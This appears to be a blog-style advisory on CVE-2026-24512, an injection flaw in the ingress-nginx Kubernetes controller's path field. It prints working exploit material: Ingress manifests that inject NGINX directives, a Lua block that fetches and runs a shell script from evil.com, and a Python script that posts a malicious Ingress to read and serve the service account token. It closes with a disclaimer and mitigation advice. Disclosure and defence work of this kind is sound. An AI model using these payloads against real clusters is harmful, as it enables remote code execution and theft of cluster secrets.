CVE-2026-24512 - Critical NGINX Injection Flaw in Ingress-NGINX Exposes Kubernetes to Code Execution and Secret Theft

A new security vulnerability, tracked as CVE-2026-24512, has been discovered in the popular ingress-nginx controller for Kubernetes. This flaw allows attackers to inject arbitrary NGINX configuration directly through the rules.http.paths.path field of the Ingress object. In simple terms, by carefully crafting Ingress resources, a bad actor can make NGINX execute malicious code and even read Kubernetes Secrets that the controller can access.

Since ingress-nginx is widely used to expose Kubernetes applications to the internet, the impact is severe — especially because default installations let the controller access all cluster Secrets.

Below, you’ll find an easy-to-understand explanation, example attack, references, and tips for mitigation.

Technical Details

Kubernetes exposes apps using Ingress resources. Users define access rules via Ingress objects, which specify URL paths and backends. Here’s a basic Ingress example:

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: demo-ingress
spec:
  rules:
    - host: myapp.example.com
      http:
        paths:
          - path: /demo
            pathType: Prefix
            backend:
              service:
                name: demo-service
                port:
                  number: 80

But due to CVE-2026-24512, it’s possible to *abuse* the path field to inject arbitrary NGINX directives.

How the Injection Works

The ingress-nginx controller builds its NGINX config from Ingress objects. It doesn’t properly sanitize inputs in the path field. For example, if you create an Ingress like:

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: attacker-ingress
spec:
  rules:
    - host: victim.example.com
      http:
        paths:
          - path: "/evil_path;\ninclude /etc/nginx/evil.conf;\n"
            pathType: ImplementationSpecific
            backend:
              service:
                name: dummy
                port:
                  number: 80

Notice the path:
/evil_path;\ninclude /etc/nginx/evil.conf;\n

When parsed, this *injects* an include directive into the main NGINX configuration, letting the attacker *load* any file that the NGINX process can read, or influence NGINX behavior.

If the NGINX installation has the Lua module (common in cloud installs)

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: pwn-ingress
spec:
  rules:
    - host: hack.example.com
      http:
        paths:
          - path: "/pwn;\nlua_code_cache off;\ncontent_by_lua_block { os.execute('curl http://evil.com/shell -o /tmp/shell; sh /tmp/shell'); }\n"
            pathType: ImplementationSpecific
            backend:
              service:
                name: throwaway
                port:
                  number: 80

This injects a *Lua* handler that fetches and runs malware.

Secret Access

The NGINX controller pod typically mounts Kubernetes API credentials, letting it read arbitrary Secrets. Attackers can use the NGINX injection to make outbound HTTP requests (via Lua or subrequests) to exfiltrate those Secrets to the internet. In *default installs*, the ingress-nginx ServiceAccount has read access to all cluster Secrets.

Below is a simplified exploit flow in Python, showing how an attacker could automate this attack

import requests
import yaml

# Configuration - set these to your target
INGRESS_API = 'https://k8s-api-server/apis/networking.k8s.io/v1/namespaces/default/ingresses';
API_TOKEN = 'eyJhbGciOi...'

# Malicious path injection
malicious_path = "/hack;\ncontent_by_lua_block { local f = io.popen('cat /var/run/secrets/kubernetes.io/serviceaccount/token') local t = f:read('*all') f:close() ngx.say(t) };"

# Prepare YAML
attack_ingress = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "Ingress",
    "metadata": {"name": "haxor"},
    "spec": {
        "rules": [{
            "host": "pwned.example.com",
            "http": {
                "paths": [{
                    "path": malicious_path,
                    "pathType": "ImplementationSpecific",
                    "backend": {
                        "service": {
                            "name": "dummy",
                            "port": {"number": 80}
                        }
                    }
                }]
            }
        }]
    }
}

# Send exploit
headers = {
    'Authorization': f'Bearer {API_TOKEN}',
    'Content-Type': 'application/yaml'
}
resp = requests.post(INGRESS_API, data=yaml.dump(attack_ingress), headers=headers, verify=False)
print("Exploit sent:", resp.status_code, resp.text)

Disclaimer: This is for educational purposes only and should not be used against systems you do not own or have explicit permission to test.

References

- Kubernetes Ingress-NGINX Docs
- Kubernetes Security Audit
- NGINX Lua Module

Official CVE trackers:

- NVD - CVE-2026-24512 *(not live yet, mirror once available)*
- Kubernetes CVE Feed

How to Fix and Mitigation

Due to the risk, you should immediately upgrade ingress-nginx controllers as patches land.

Until then

- Disallow untrusted users and teams from creating/modifying Ingress resources.
- Use RBAC to restrict Ingress and Secret object access.

Monitor for suspicious Ingresses, especially those with unusual or multiline path fields.

- Use PodSecurityPolicies to confine the NGINX controller pod privileges.

Conclusion

CVE-2026-24512 is a critical risk for any Kubernetes cluster using ingress-nginx, enabling attackers to take full control of your controller pod and potentially your entire cluster by leaking all accessible Secrets.

Apply patches and mitigation immediately! Track the ingress-nginx GitHub releases page for updates on fixes.

Timeline

Published on: 02/03/2026 22:17:08 UTC
Last modified on: 03/09/2026 21:16:14 UTC